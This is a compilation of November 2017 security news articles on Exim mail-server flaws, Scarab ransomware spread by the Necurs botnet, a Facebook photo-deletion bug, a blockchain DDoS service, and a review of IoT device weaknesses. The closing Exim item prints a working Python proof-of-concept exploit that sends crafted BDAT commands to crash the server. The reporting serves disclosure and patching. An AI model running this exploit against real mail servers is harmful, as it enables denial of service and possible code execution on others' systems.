Gladius Shows Promise in Utilizing Blockchain Tech to Fight Hackers
27.11.2017 thehackernews  Hacking


Image Credit: Pixelbay
Blockchain startups are cropping up left and right aiming to disrupt existing services and business models.
These range from the trivial to potentially game-changing solutions that can revolutionize the internet as we know it. Among those that promise to change the world, most are attempting to reconstruct the entire internet infrastructure into something that is decentralized, secure, scalable, and tokenized.
There are also those that aim to solve the most significant problems plaguing the digital world, particularly potentially costly and tedious security issues. We do not lack for dangers, ranging from data breaches to denial-of-service attacks, and other hacks.
For the most part, there are capable SaaS and software-defined services that are capable enough in addressing the threats that involve malware and DDoS.
However, blockchains offer much much more.
The plague of DDoS
Distributed denial-of-service or DDoS attacks involve a malicious hacker deploying a network of infected computers in sending traffic and making queries to the target host. By deploying a botnet with potentially thousands of unique devices, it is difficult to block on a per-IP basis.
Oftentimes, without adequate protection, a DDoS attack can slow down a website or service to a crawl until it is no longer accessible either by running out of bandwidth allocation or simply being overwhelmed with traffic.
According to this DDos Impact survey, almost half of respondents say they have encountered a DDoS attack, with more than 90 percent of these businesses being attacked a span of 12 months.
The average DDoS attack lasted between 6 to 24 hours, and at the cost of $40,000 per hour, these cost businesses about $500,000 per attack on average, with some even costing more for larger enterprises.
For small businesses, the cost can be more severe, especially for those that depend solely on their online operations and sales to thrive.
These are only the costs associated with IT activity. When a website goes down, all its business goes down with it – this can be particularly troublesome for a company running an e-commerce website or a consumer-facing application.
Blockchain-based solutions for DDoS
Sadly, a DDoS attack is something that cannot be prevented. You can only mitigate its effects, and your infrastructure can merely ward off the excessive traffic and bandwidth utilization through several means. For the most part, deploying DDoS protection entails deflecting any botnet traffic, so that your main server or cloud deployment is not overloaded.
As earlier mentioned, cloud-based DDoS protection acts as a barrier between the main server and the internet-at-large Whenever an attack occurs, the service efficiently “absorbs” the traffic to minimize the impact on the infrastructure itself.
This can only go so far, however. Even the most robust of cloud infrastructures can just handle so much traffic. Besides, for businesses, the costs involved could be overwhelming.
Here is where a blockchain and a highly distributed approach can offer more value.
Gladius, a blockchain service for DDoS prevention and website acceleration aims to leverage on its global network of individual and independent nodes in mitigating the effects of a DDoS attack and caching content all across the world to make the website load faster.
Being a decentralized network, users can rent out their spare bandwidth through a desktop client and earn money by sharing their bandwidth. Then, their excess bandwidth is distributed to nodes which in turn funnel the bandwidth to websites under DDoS attacks to make sure they stay up.
During “peace time” or periods without a DDoS, Gladius’ network also speeds up access to the internet by acting as a content delivery network, wherein web content is cached for faster delivery to the target client’s browser.
The perks of a peer-to-peer network

Image Credit: Gladius
A decentralized network has additional benefits beyond the simple cloud-based deployment.
While a cloud is, to some extent, distributed, it is still owned by whoever runs the platform. In contrast, a blockchain runs completely off of a decentralized network, wherein the nodes are independently owned.
Herein lies the additional benefit.
With most blockchains, nodes are rewarded through a tokenized incentive scheme – it is the same with Gladius. Individual computer owners can earn cryptocurrency tokens whenever their resources are shared with the network.
Toward a decentralized sharing economy
Blockchain startups are representative of where we are heading in the future: a truly decentralized sharing economy. We have had a glimpse of such sharing economies with platforms like Uber, Airbnb, and the like.
However, these foster a sharing economy without the decentralized aspect – the platform is still owned by a corporate entity, for instance.
With blockchain startups, the sharing economy is built entirely upon the independent and decentralized nodes that make up the network.
Bitcoin proved that we could have an exchange of value through a decentralized system. Ethereum proved we could establish self-executing smart contracts without third parties or mediums.
With solutions like Gladius, we are likewise hopeful that the internet’s infrastructure can be disrupted for the benefit of both users and business that build value.


Exim Internet Mailer Found Vulnerable to RCE And DoS Bugs; Patch Now
27.11.2017 thehackernews  Vulnerebility

A security researcher has discovered and publicly disclosed two critical vulnerabilities in the popular Internet mail message transfer agent Exim, one of which could allow a remote attacker to execute malicious code on the targeted server.
Exim is an open source mail transfer agent (MTA) developed for Unix-like operating systems such as Linux, Mac OSX or Solaris, which is responsible for routing, delivering and receiving email messages.
The first vulnerability, identified as CVE-2017-16943, is a use-after-free bug which could be exploited to remotely execute arbitrary code in the SMTP server by crafting a sequence of BDAT commands.
"To trigger this bug, BDAT command is necessary to perform an allocation by raising an error," the researcher said. "Through our research, we confirm that this vulnerability can be exploited to remote code execution if the binary is not compiled with PIE."
The researcher (mehqq_) has also published a Proof-of-Concept (PoC) exploit code written in python that could allow anyone to gain code execution on vulnerable Exim servers.
The second vulnerability, identified as CVE-2017-16944, is a denial of service (DoS) flaw that could allow a remote attacker to hang Exim servers even the connection is closed by forcing it to run in an infinite loop without crashing.
The flaw exists due to improper checking for a '.' character to signify the end of an email when parsing the BDAT data header.
"The receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89 allows remote attackers to cause a denial of service (infinite loop and stack exhaustion) via vectors involving BDAT commands and an improper check for a '.' character signifying the end of the content, related to the bdat_getc function," the vulnerability description reads.
The researcher has also included a proof-of-concept (PoC) exploit for this vulnerability as well, making Exim server run out of stack and crash.
Both vulnerabilities reside in Exim version 4.88 and 4.89, and sysadmins are recommended to update their mail transfer agent application Exim version 4.90 released on GitHub.


World's Biggest Botnet Just Sent 12.5 Million Emails With Scarab Ransomware
27.11.2017 thehackernews  BotNet

A massive malicious email campaign that stems from the world's largest spam botnet Necurs is spreading a new strain of ransomware at the rate of over 2 million emails per hour and hitting computers across the globe.
The popular malspam botnet Necrus which has previously found distributing Dridex banking trojan, Trickbot banking trojan, Locky ransomware, and Jaff ransomware, has now started spreading a new version of Scarab ransomware.
According to F-Secure, Necurs botnet is the most prominent deliverer of spam emails with five to six million infected hosts online monthly and is responsible for the biggest single malware spam campaigns.
Scarab ransomware is a relatively new ransomware family that was initially spotted by ID Ransomware creator Michael Gillespie in June this year.
Massive Email Campaign Spreads Scarab Ransomware

According to a blog post published by security firm Forcepoint, the massive email campaign spreading Scarab ransomware virus started at approximately 07:30 UTC on 23 November (Thursday) and sent about 12.5 million emails in just six hours.
The Forcepoint researchers said "the majority of the traffic is being sent to the .com top-level domain (TLD). However, this was followed by region-specific TLDs for the United Kingdom, Australia, France, and Germany."
The spam email contains a malicious VBScript downloader compressed with 7zip that pulls down the final payload, with one of these subject lines:
Scanned from Lexmark
Scanned from Epson
Scanned from HP
Scanned from Canon
As with previous Necurs botnet campaigns, the VBScript contained a number of references to the widely watched series Game of Thrones, like the strings 'Samwell' and 'JohnSnow.'
The final payload is the latest version of Scarab ransomware with no change in filenames, but it appends a new file extension with ".[suupport@protonmail.com].scarab" to the encrypted files.
Once done with the encryption, the ransomware then drops a ransom note with the filename "IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT" within each affected directory.
The ransom note does not specify the amount being demanded by the criminals; instead, it merely states that "the price depends on how fast you [the victim] write to us."
However, Scarab ransomware offers to decrypt three files for free to prove the decryption will work: "Before paying you can send us up to 3 files for free decryption."
Protection Against Ransomware
To safeguard against such ransomware infection, you should always be suspicious of any uninvited document sent over an email and should never click on links provided in those documents unless verifying the source.
Most importantly, keep a good backup routine in place that makes their copies to an external storage device that is not always connected to your PC in order to always have a tight grip on all your important files and documents.
Moreover, make sure that you run an active anti-virus solution on your system, and always browse the Internet safely.


Another Facebook Bug Allowed Anyone to Delete Your Photos

27.11.2017 thehackernews  Social

If you think a website whose value is more than $500 billion does not have any vulnerability in it, then you are wrong.
Pouya Darabi, an Iranian web developer, discovered and reported a critical yet straightforward vulnerability in Facebook earlier this month that could have allowed anyone to delete any photo from the social media platform.
The vulnerability resides in Facebook's new Poll feature, launched by the social media giant earlier this month, for posting polls that include images and GIF animations.
Darabi analyzed the feature and found that when creating a new poll, anyone can easily replace the image ID (or gif URL) in the request sent to the Facebook server with the image ID of any photo on the social media network.

 

Now, after sending the request with another user image ID (uploaded by someone else), that photo would appear in the poll.
"Whenever a user tries to create a poll, a request containing gif URL or image id will be sent, poll_question_data[options][][associated_image_id] contains the uploaded image id," Darabi said. "When this field value changes to any other images ID, that image will be shown in poll."
Apparently, if the creator of the poll deletes that post (poll), as demonstrated in the video above, it would eventually delete the source photo as well, whose image ID was added to the request—even if the poll creator doesn't own that photo.
The researcher said he received $10,000 as his bug bounty reward from Facebook after he responsibly reported this vulnerability to the social media network on November 3. Facebook patched this issue on November 5.
This isn't the first time when Facebook has been found dealing with such a vulnerability. In the past, researchers discovered and reported several issues that let them delete videos, photo albums, and comments and modify messages from the social media platform.
Darabi has also previously been awarded by Facebook with a $15,000 bug bounty for bypassing its cross-site request forgery (CSRF) protection systems (in 2015) and another $7,500 for a similar issue (in 2016).


IoT lottery: finding a perfectly secure connected device
27.11.2017 Kaspersky IoT
Black Friday and Cyber Monday are great for shopping. Vendors flood the market with all kinds of goods, including lots of exciting connected devices that promise to make our life easier, happier and more comfortable. Being enthusiastic shoppers just like many other people around the world, at Kaspersky Lab we are, however paranoid enough to look at any Internet of Things (IoT)-device with some concern, even when the price is favorable. All because there is little fun in buying a coffeemaker that would give up your home or corporate Wi-Fi password to an anonymous hacker, or a baby-monitor that could livestream your family moments to someone you most definitely don’t want it livestreamed to.

It is no secret that the current state of security of the IoT is far from perfect, and in buying one of those devices you are potentially buying a digital backdoor to your house. So, while preparing for IoT-shopping this year, we asked ourselves: what are our chances of buying a perfectly secure connected device? To find the answer, we conducted a small experiment: we randomly took several different connected devices and reviewed their security set up. It would be an exaggeration to say that we conducted a deep investigation. This exercise was more about what you’d be able to see at first glance if you had a clue about how these things should and shouldn’t work. As a result we found some rather worrying security issues and a few, less serious, but unnecessary ones.

We looked at the following devices: a smart battery charger, an app-controlled toy car, an app-controlled smart set of scales, a smart vacuum cleaner, a smart iron, an IP camera, a smart watch, and a smart home hub.

Smart Charger
The first device we checked was the smart charger that attracted us with its built-in Wi-Fi connectivity. You may ask yourself: who would need a remotely controlled battery charger, especially when you need to manually set the battery to charge? Nevertheless, it exists and it allows you not only to charge the battery, but to manage the way you charge it. Like a boss.

The device we tested charges and restores most types of batteries with a nominal voltage from 3 to 12 volts. It has a Wi-Fi module, which allows the device owner to connect remotely to control the charging process, to change the charging settings and to check how much electricity the battery is storing at any time.
 

Once turned on, the device switches by default to ‘access point’ mode. The user should then connect to the device and open the management interface web page. The connection between the charger and the device you use to access the management panel uses the outdated and vulnerable WEP algorithm instead of WPA2. However it is password protected. Having said that, the predefined password is ‘11111’ and it is actually written in the official documentation that comes with the device and is searchable online. However, you can change the password to a more secure one. Having said that, the length of the password is limited, for some reason, to five symbols. Based on the information available here, it would take four minutes to crack such a password. In addition to that the web interface of the device itself has no password protection at all. It is available as is, once it is connected to your home Wi-Fi network.

Who would attack a smart charger anyway, you may well ask, and you would probably be right as there are likely few black hat hackers in the world who would want to do that. Especially when it requires the attacker to be within range of the Wi-Fi signal or have access to your Wi-Fi router (which, by the way, is a much bigger problem). On the other hand, the ability to interfere with how the battery is charging, or randomly switching the parameters could be considered as worth a try by a wicked person. The probability of real damage, like setting fire to the battery or just ruining it is heavily dependent on the type of battery, however the attack can be performed just for lulz. Just because they can.

To sum up: most likely when using this device, you won’t be in constant danger of a devastating remote cyberattack. However, if your battery eventually catches fire while charging, it could be a sign that you have a hacker in your neighborhood, and you have to change the password for the device. Or it could be the work of a remote hacker, which probably means that your Wi-Fi router needs a firmware update or a password change.

Smart App-Controlled Wireless Spy Vehicle
While some people are looking for useful IoT features, other seek entertainment and fun. After all, who didn’t dream of their own spying toolset when they were young? Well, a Smart App-Controlled Wireless Spy Vehicle would have seemed a dream come true.

This smart device is actually a spy camera on wheels, connected via Wi-Fi and managed via an application. The spy vehicle, sold in toy stores, has Wi-Fi as the only connection interface. For management there are two official applications, for iOS and Android. We assumed that there could be a weakness in the Wi-Fi connections – and we turned out to be right.
 

The device is able to execute the following commands:

Move across the area (with multiple riding modes, it is possible to control speed and direction)
View an image from the navigation camera during movement, for ease of navigation
View an image from the main camera, which can also be rotated in different directions (there is even a night vision mode)
Record photos and videos that are stored in the phone’s memory
Play audio remotely via a built-in speaker
Once connected to a phone, it becomes a Wi-Fi access point without password requirements. In other words, any person connected to it can send remote commands to the vehicle – you’d just need to know which commands to send. And if you – being a bit concerned about the lack of password protection in a child’s toy that has spying capabilities – decided to set one up, you’d find there was no opportunity to do so. And if you have basic network sniffing software on your laptop, and decided you’d like to see what the vehicle was currently filming, you’d be able to intercept the traffic between the vehicle and the controlling device.

That said, a remote attack is not possible with this device, and an offensive third-party would have to be within the range of the toy’s Wi-Fi signal which should be enabled. But on the other hand, nothing prevents an attacker from listening to your traffic in a passive mode and catching the moment when the device is used. So if you have seen someone with a Wi-Fi antenna near your house recently, chances are they’re curious about your private life, and have the means to look into it.

Smart Robo Vacuum Cleaner. With camera
Speaking of other devices with cameras that are around you, we spent some time trying to figure out why a smart vacuum cleaner would need to have a web-cam – is it for the macro filming of dust? Or to explore the exciting under-bed world? Joking aside, this function was made specifically for the cleaning enthusiast: if you find it exciting to control the vacuum cleaner manually while checking exactly what it’s doing, this is the gadget for you. Just keep in mind that it is not quite secure.
 

The device is managed via a specific application – you can control the cleaner’s movement, get video live-streaming while it’s cleaning, take pictures, etc. The video will disappear after streaming, while photos are stored in the application.

There are two ways to connect to the device via Wi-Fi:

With the cleaner as access point. If you don’t have a Wi-Fi network in your home, the device will provide the connection itself. You simply connect to the cleaner via the mobile application – and off you go!
The cleaner can also work as a Wi-Fi adapter, connected to an existing access point. After connecting to the cleaner-as-access-point you can then connect the device to your home Wi-Fi network for better connection and operation radius.
As the device is managed via a mobile phone application, the user should first go through some kind of authorization. Interestingly enough, for this they only need to enter a weak default password – and that’s it. Thus, an attacker just needs to connect to cleaner’s access point, type in the default password to authorize themselves in the application for pairing the mobile phone and the cleaner. After the pairing is completed, they can control the device. Also, after connection to a local network, the robot vacuum cleaner will be visible in the local network and available via a telnet protocol to anyone who is also connected to this network. Yes, the connection is password protected, which can be changed by the owner of the device (but really, who does that?!), and no, there is no brute force protection in place.

Also the traffic between the app and the device is encrypted, but the key is hard-coded into the app. We are still examining the device, and the following statement should be taken with a big grain of salt, but potentially a third-party could download the app from Google Play, find the key and use it in a Man-in-the-Middle attack against the protocol.

And, of course, like any other Android-app controlled connected device, the robot vacuum cleaner is a subject to attack via rooting malware: upon gaining super user rights, it can access the information coming from the cleaner’s camera and its controls. During the research, we also noticed that the device itself runs on a very old version of Linux OS, which potentially makes it subject to a range of other attacks through unpatched vulnerabilities. This, however, is the subject of ongoing research.

Smart Camera
IP cameras are the devices targeted most often by IoT-hackers. History shows that, besides the obvious unauthorized surveillance, this kind of device can be used for devastating DDoS-attacks. Not surprisingly, today almost any vendor producing such cameras is in the cross-hairs of hackers.

In 2015, our attempt to evaluate the state of security of consumer IoT took a look at baby monitor; this year we’ve focused on a rather different kind of camera: the ones used for outside surveillance – for example the ones you’ve put up in your yard to make sure neighbors don’t steal apples from your trees.
 

Originally, the device and its relatives from the same vendor were insecure due to a lack of vendor attention to the problem. But the issue of camera protection changed dramatically around 2016 after reports of unauthorized access to cameras became publicly known through a number of publications like here or here.

Previously, all the cameras sold by this vendor were supplied with a factory default account and default password ‘12345’. Of course, users tended not to change the password. In 2016, the picture changed radically when the vendor became an industry pioneer in security issues, and started to supply cameras in ‘not activated’ mode. Thus, there was no access to the camera before activation. Activation required the creation of a password and some network settings. Moreover, the password was validated in terms of basic complexity requirements (length, variety of characters, numbers and special characters). Activation of the camera could be performed from any PC with access to the camera over the local network.

Since this reform, updating the firmware on a camera with a default password leads to the camera demanding a password change and warning the user about security issues every time they connect. The password requirements are quite solid:
 

Additionally, protection from password brute forcing has been implemented:
 

Moreover, the vendor added a new security feature to the firmware in 2016. This involves protection against brute forcing, by automatically blocking access for an IP address after five to seven attempts to enter the wrong password. The lock is automatically removed after 30 minutes. The feature, which is enabled by default, significantly increases the level of security.

Nevertheless, not everything is perfect in the camera. For instance, the exchange of data with the cloud is performed via HTTP, with the camera’s serial number as its ID. This obviously makes Man-in-the-Middle attacks more realistic.

In addition to a standard WEB interface for such devices, there is a specialized tool for camera configuration, which can search for cameras on the network, display data on the cameras, and perform basic settings including activation, password changes, and the implementation of password resets for network settings. When triggering the device search the PC sends a single Ethernet frame.

The camera’s response is not encrypted, and contains model information such as the firmware, date reset and network settings. Since this data is transmitted in a non-encrypted way and the request does not have authorization, this one Ethernet package can detect all cameras on the network and obtain detailed information about them. The algorithm has one more weakness: when forming a response, time delays are not considered. As a consequence, it is easy to organize a DDoS attack in the network, sending such requests to all cameras within the presented Ethernet network .

Apart from the described specific protocol, cameras support a standard SSDP protocol for sending notifications, and this allows any software or hardware to automatically detect the cameras. This SSDP data also contains information about the model and serial number of the camera.

One more attack vector lies in the remote password reset, which is supported by a technical support service. Anyone with access to the camera’s network can select a camera through the specialized tool for camera configuration and request the reset procedure. As a result, a small file containing the serial number of the camera is created. The file is sent to the technical support service, which then either refuses the request or sends a special code to enter a new password. Interestingly enough, the service doesn’t even try to check whether the user is the owner of the camera – outdoor surveillance assumes that the camera is located out of reach, and it is almost impossible to identify remotely the author of the request. In this scenario, an insider cybercriminal attack is the most probable vector.

To sum up: luckily this is not the worst camera we’ve ever seen when it comes to cybersecurity; however, some unnecessary issues are still there to be exploited by an offensive user.

Smart Bathroom Scales
Remember that picture from the internet, where hacked smart scales threaten to post their owner’s weight online if they don’t pay a ransom? Well, joking aside we’ve proved this may be possible!
 

This is a smart device, interacting with a smartphone app via Bluetooth, but it is also equipped with a Wi-Fi module. This connectivity provides the owner with a number of additional features, from weight monitoring on a private website secured by a password to body analysis and integration with various healthcare apps. Interestingly enough, the only Wi-Fi-enabled feature is the receiving of weather updates.

We decided to test the possibility of arbitrary updates\software installation on the specified device in LAN using ARP spoofing and the implementation of Man-in-the-Middle attacks. Here’s what we found.
 

The mobile phone interacts with the main server via HTTPS, in a series of queries. The scales themselves are connected to the mobile phone via Bluetooth. The process of pairing is simple: you request connection via the application, and then turn the scales’ Bluetooth connection on. Given the very limited time for this stage, it is very unlikely that someone will be able to pair the devices without the user’s knowledge.

Among other things, the device transmits via Bluetooth various user data – mail, indication of weight, etc. The device receives updates via the application. The latter sends the current version of updates and a number of other parameters to the server – the server, in turn, passes to the application a link to the downloaded file and its checksum.

However the updates are provided as is, on the HTTP channel, without encryption, and the updates themselves are also not encrypted. Thus, if you are able to listen to the network to which the device is connected you would be able to spoof the server response or the update itself.

This enabled us to, firstly, ‘roll back’ the version of the updates, and then install a modified version that does not match the one retrieved from the server. In this scenario, the further development of attacks is possible, like installing arbitrary software on the device.

The good news is that this device has no camera, so even if any other severe vulnerabilities are found, you are safe. Besides that, who would want to spend time on hacking smart scales? Well, the concern is a valid one. First of all, see the picture at the beginning of this text, and secondly: as we already mentioned above, sometimes hackers do things just because they can, because certain things are just fun to crack.

Smart Iron
Fun to crack – that is something you can definitely say about a smart iron. The very existence of such a device made us very curious. The list of things you could potentially do should a severe vulnerability be found and exploited looked promising. However, the reality turned out to be rather less amusing. Spoiler: based on our research it is impossible to set fire to the house by hacking the iron. However, there are some other rather interesting issues with this device.

The iron has a Bluetooth connection that enables a number of remote management options through a mobile app. We assumed that communication with the server would be insecure, allowing someone to take control of the device and its sensitive data, as manufacturers would not be paying enough attention to the protection of this channel, believing that a smart iron would be of little value to an attacker.

Once it is connected to the user’s mobile phone, the iron is managed via the application, which exists in versions for both iOS and Android. The app allows you to:

View the orientation of the iron (whether it is lying flat, standing, or hanging by its cable)
Disable (but – sadly – not enable) the iron
Activate ‘safe mode’ (in which iron does not react to a mechanical switch on. To turn the iron on when it is in that mode you need to turn off safe mode in the app).
In terms of on/off safety the iron automatically switches off if it is stationary for five seconds in a ‘lying’ position, or for eight minutes in a ‘standing’ position.

The iron can also be controlled via the internet. For this, it is necessary to have a gateway near the device, like a separate smartphone or tablet with internet access and a special app.

Given all that, we decided to take a closer look at the applications for the device. There are three of them – one for iOS and two for Android. The first Android app is for when you manage the device via Bluetooth and are standing nearby, and the other one is for the gateway, which serves as an online door to your iron when you are not at home. The iOS app is for Bluetooth management. Speaking about the security of all applications, it is worth mentioning that the vendor’s code is not obfuscated at all.

When viewing online traffic, we found out that the Android Bluetooth application uses HTTPS, which is a sensible solution. The corresponding app for iOS does not and neither does the gateway app for Android. We decided to test the traffic for the iOS application.
 

Example of phishing attack via the application

Once it is enabled, the application offers the user the chance to register, and then sends the data without encryption via HTTP. This gives us a very simple attack vector based on the interception of traffic between the mobile application and the vendor’s server within the local network.

As already mentioned, the phone also communicates with the iron using BLE. The BLE traffic is also not encrypted. After deeper investigation of the applications, we were able to control the iron by creating specific commands just from looking into what is transmitted between the devices.

So, if you were a hacker, what could you do with all this knowledge? First of all if you would be able to capture the user’s credentials, to pass the authorization stage in an official application and to switch off the iron or set it to ‘safe mode’. It is important to note here that these applications are used for all of the vendor’s smart devices, and there are quite a few. This significantly enlarges the attack surface.

No need to worry if you miss the chance to intercept the authentication data. Given that the data exchange between the app and the device is not encrypted, you would be able to intercept a token transmitted from the server to the application and then create your own commands to the iron.

As a result, within the local network an attacker can perform:

Identity theft (steal personal email address, username, password)
Extortion (take advantage of the ignorance of the user to enable ‘safe mode’ so that the user could not mechanically turn on the iron, and to demand money for disabling ‘safe mode’)
Of course both these vectors are highly unlikely to be extensively performed in the wild, but they are still possible. Just imagine how embarrassing it would be if your private information was compromised, not as a result of an attack by a sophisticated hackers, but because of the poor security of your smart iron.

Smart home hub
The biggest problem with the vast majority of connected devices currently available is that most of them work with your smartphone as a separate, independent device, and are not integrated into a larger smart ecosystem. The problem is partly solved by so called smart hubs – nodes that unite in one place the data exchange between multiple separate smart devices. Although prior art in finding a secure smart hub, conducted by multiple other researchers, leaves little room for hope, we tried anyway and took a fancy smart hub with a touch screen and the ability to work with different IoT-protocols. It is universally compatible, works with ZigBee и ZWave home automation standards, and very easy to handle: according to the manufacturer, it can be set up within three minutes, using the touchscreen.
 

In addition the hub serves as a wireless Wi-Fi router.

Given all the features this multi-purpose device has, being a router, range extender, access point or wireless bridge, we decided to check one of the most common and most dangerous risks related to unauthorized external access to the router. Because, if successful, it would possibly lead to full control of a user’s smart home, including all connected devices.

And, no surprise, our research has shown there is such a possibility.

To check our assumption we created a local network, by connecting a PC, the device and one more router to each other. All network devices received their IP addresses, and we successfully scanned available ports. Our initial research has shown that, by default, there are two opened ports over WAN. The first one, port 80, is one of the most commonly used and assigned to protocol HTTP. It is the port from which a computer sends and receives web client-based communication and messages from a web server, and which is used to send and receive HTML pages or data. If opened, it means that any user can connect to port 80 and thus have access to the user’s device via the HTTP protocol.

The second one, port 22 for contacting SSH (Secure Shell) servers is used for remote control of the device. Attackers can gain access to a device if they obtain or successfully brute force a root password. Usually it’s not an easy task to do. However, in our research we explored another interesting risky thing with the smart hub that makes this much easier.

While analyzing the router, we discovered it might have problems with a very common threat risk – weak password generation. In the router system we found ELF (Executable and Linkable Format) file ‘rname’ with a list of names. By looking at this list and the password displayed on the screen, it became clear that device’s password is generated based on the names from this file and, thus, it doesn’t take long for brute force cracking.

After a hard reset, the source line for passwords remained, with slightly changed symbols. However, the main password base remained the same, and that still leaves a chance to generate a password.

In addition, we found that for device access a root account is constantly used. Thus, offensive users will know the login and a base part of the password, which will significantly facilitate a hacker attack.

In case the device has a public IP address and the ports described above are opened, the router can be available for external access from the internet. Or, in other case, if a provider or an ISP (Internet Service Provider) improperly configures the visibility of neighboring hosts of the local network, these devices will be available to the entire local network within the same ISP.

In all, we weren’t surprised; just like most any other smart hubs on the market, this one provides a really vast attack surface for an intruder. And this surface covers not only the device itself, but the network it works on. And here are the conclusions which the results of our experiment have brought us to.

Conclusions
Based on what we’ve seen while doing this exercise, the vendors of many IoT-devices developing their products assume that:

They won’t be attacked due to limited device functionality and a lack of serious consequences in the case of a successful attack.
The appropriate level of security for an IoT-device is when there is no easy way to communicate with the wider internet and the attacker needs to have access to the local network the device is connected to.
We have to say that these assumptions are reasonable, but only until the moment when a vulnerable router or multifunctional smart hub, like the one described above, appears in the network to which all other devices are connected. From that moment, all the other devices, no matter how severe or trivial their security issues, are exposed to interference. It is easy to imagine a house, apartment or office populated with all these devices simultaneously, and also easy to imagine what a nightmare it would be if someone tried each of described threat vectors.

So in answer to the question we asked ourselves at the beginning of this experiment, we can say that, based on our results at least, it is still hard to find a perfectly secure IoT-device.

On the other hand, no matter which device you purchase, most likely it won’t carry really severe security issues, but again, only until you connect them to a vulnerable router or smart hub.
 

Keeping that and the ongoing high sales holiday season in mind we’d like to share the following advice on how to choose IoT devices:

When choosing what part of your life you’re going to make a little bit smarter, consider the security risks. Think twice if you really need a camera-equipped robo vacuum cleaner or a smart iron, which can potentially spill some of your personal data to an unknown third-party.
Before buying an IoT device, search the internet for news of any vulnerability. The Internet of Things is a very hot topic now, and a lot of researchers are doing a great job of finding security issues in products of this kind: from baby monitors to app controlled rifles. It is likely that the device you are going to purchase has already been examined by security researchers and it is possible to find out whether the issues found in the device have been patched.
It is not always a great idea to buy the most recent products released on the market. Along with the standard bugs you get in new products, recently-launched devices might contain security issues that haven’t yet been discovered by security researchers. The best choice is to buy products that have already experienced several software updates.
To overcome challenges of smart devices’ cybersecurity, Kaspersky Lab has released a beta version of its solution for the ‘smart’ home and the Internet of Things – the Kaspersky IoT Scanner. This free application for the Android platform scans the home Wi-Fi network, informing the user about devices connected to it and their level of security.
When it comes to the vendors of IoT-devices, the advice is simple: collaborate with the security vendors and community when developing new devices and improving old ones.

P.S. 1 out of 8
There was one random device in our research, which showed strong enough security for us at least not to be worried about private data leakage or any other devastating consequences. It was a smart watch. Like most other similar devices, these watches require an app to pair them with the smartphone and use. From that moment, most of data exchange between the device and the smartphone, the app and the vendors’ cloud service are reliably encrypted and, without a really deep dive into encryption protocol features or the vendor’s cloud services it is really hard to do anything malicious with the device.

For the pairing the owner should use the pin code displayed on the clock for successful authorization. The pin is randomly generated and is not transmitted from the clock. After entering the pin code in the app, the phone and clock create the key for encryption, and all subsequent communication is encrypted. Thus, in the case of BLE traffic interception an attacker will have to decrypt it as well. For this, an attacker will need to intercept traffic at the stage of generating the encryption key.

It is apparently impossible to get user data (steps, heart rate etc.) directly from the device. Data synchronization from the clock on the phone is encrypted and, in the same form is sent to the server. Thus, data on the phone is not decrypted, so the encryption algorithm and the key are unknown.
 

From our perspective this is an example of a really responsible approach to the product, because, by default the vendor of this device could also easily limit their security efforts to assuming that no one will try to hack their watches, as, even if successful, nothing serious happens. This is probably true: it is hard to imagine a hacker who would pursue an opportunity to steal information about how many steps you made or how fast your heart beats at any given moment of the day. Nevertheless, the vendor did their best to eliminate even that small possibility. And this is good, because cybersecurity is not all those boring and costly procedures which you have to implement because some hackers found some errors in your products, we think cybersecurity is an important and valuable feature of an IoT-product, just like its usability, design and list of useful functions. We are sure that as soon as IoT-vendors understand this fact clearly, the whole connected ecosystem will become much more secure than it is now.


Facebook Flaw Allowed Removal of Any Photo
27.11.2017 securityweek Social
A researcher says he received a $10,000 bounty from Facebook after finding a critical vulnerability that could have been exploited to delete any photo from the social media network.

In early November, Facebook announced a new feature for posting polls that include images and GIF animations. Iran-based security researcher and web developer Pouya Darabi analyzed the feature shortly after its launch and discovered that it introduced an easy-to-exploit flaw.

When a user created a poll, the request sent to Facebook servers included the identifiers of the image files added to the poll. The expert noticed that users could replace the image ID in the request with the ID of any photo on Facebook and that photo would appear in the poll.

Darabi then discovered that once the creator of the poll deleted the post, the image whose ID was added to the request would also get removed from Facebook.

The vulnerability was reported to Facebook on November 3 and a temporary fix was rolled out the same day. The company deployed a complete patch on November 5.

Darabi said he received a $10,000 bug bounty for his findings. The researcher has published a blog post and a video describing the vulnerability.

This was not the first time Darabi earned a significant bounty from Facebook. Back in 2015, the social media giant awarded him $15,000 for bypassing its cross-site request forgery (CSRF) protection systems. The next year he received another $7,500 for a similar weakness.

These types of vulnerabilities are not uncommon on Facebook. In the past years, researchers reported finding several flaws that could have been exploited to delete comments, videos, and photos from Facebook. The security holes, which in most cases involved replacing the ID of the targeted resource in a request, earned researchers roughly $10,000.

Facebook has paid out millions of dollars to researchers who found vulnerabilities in the social media network since the launch of its bug bounty program in 2011.


Unix mailer Exim is affected by RCE, DoS vulnerabilities. Apply the workaround asap
27.11.2017 securityaffairs Vulnerebility

The Exim Internet mail message transfer agent warned of flaws through the public bug tracker, sys admins have to apply the workaround asap.
Exim is a message transfer agent (MTA) developed at the University of Cambridge for use on Unix systems connected to the Internet, it is the most popular MTA on the Internet.

The Internet mail message transfer agent warned of flaws through the public bug tracker, an unfortunate choice to disclose it because the notice could be ignored.

According to the message published on the bug tracker, when parsing the BDAT data header, Exim scans for the ‘.’ character to signify the end of an e-mail.

“A remote code execution vulnerability has been reported in Exim, with immediate public disclosure (we were given no private notice). A tentative patch exists but has not yet been confirmed.

With immediate effect, please apply this workaround: if you are running Exim 4.88 or newer (4.89 is current, 4.90 is upcoming) then in the main section of your Exim configuration, set:

chunking_advertise_hosts =

That’s an empty value, nothing on the right of the equals. This disables advertising the ESMTP CHUNKING extension, making the BDAT verb unavailable and avoids letting an attacker apply the logic.”

Assigning the empty value to the chunking_advertise_hosts turns off the vulnerable function.

EXIM DOS RCE

The advisory included a proof-of-concept code that cause the Exim crash because the function pointer, receive_getc is not reset.

# pip install pwntools
from pwn import *

r = remote('localhost', 25)

r.recvline()
r.sendline("EHLO test")
r.recvuntil("250 HELP")
r.sendline("MAIL FROM:<test@localhost>")
r.recvline()
r.sendline("RCPT TO:<test@localhost>")
r.recvline()
#raw_input()
r.sendline('a'*0x1100+'\x7f')
#raw_input()
r.recvuntil('command')
r.sendline('BDAT 1')
r.sendline(':BDAT \x7f')
s = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)
r.send(s+ ':\r\n')
r.recvuntil('command')
#raw_input()
r.send('\n')
r.interactive()
exit()
Below the announcement for CVE-2017-16944 vulnerability affecting the SMTP daemon in Exim 4.88 and 4.89.

